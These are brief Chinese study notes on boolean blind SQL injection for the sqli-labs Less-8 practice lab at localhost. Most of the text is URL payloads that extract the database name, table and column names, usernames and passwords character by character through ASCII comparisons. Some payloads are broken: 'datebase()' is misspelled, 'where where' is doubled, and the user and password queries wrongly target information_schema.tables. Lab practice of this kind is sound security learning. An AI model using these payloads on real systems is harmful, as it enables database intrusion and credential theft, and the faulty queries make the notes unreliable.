Less -8

盲注 之bool注入

length（） 函数
 substr（） 截取字符串
ASCII（） 返回字符的ASCII码
database（） 返回当前数据库的名字；
strsub（字符串，位置，长度）；
 前端注入：

数据库名的获取
   select * from table where id = 'input';
1' and (ascii(substr(datebase(),1,1)))<120--+
115 s
101 e
and (ascii(substr(datebase(),9,1)))=0--+时便可知数据库名为security
....security


表名的获取
-8/
?id=1' and (ascii(substr((select table_name from information_schema.tables where where table_schema=database() limit 1,1),1,1))=114)--+
114 r
101 e
102 f
101 e
...
可得 email referers uagent users;

列名字的获取
-8/
?id=1' and (ascii(substr((select column_name from information_schema.tables where table_name='users' limit 1,1),1,1))=114)--+
可得 id,username, password;

用户名的获取

http://localhost/sqli-labs-master/Less-8/?id=1'
and (ascii(substr((select username from information_schema.tables where table_name='users' limit 0,1),1,1))=68)--+
....
则可知username 为Dumb Angelina...

密码的获取
http://localhost/sqli-labs-master/Less-8/?id=1'
and (ascii(substr((select password from information_schema.tables where table_name='users' limit 0,1),1,1))=68)--+
则可知密码；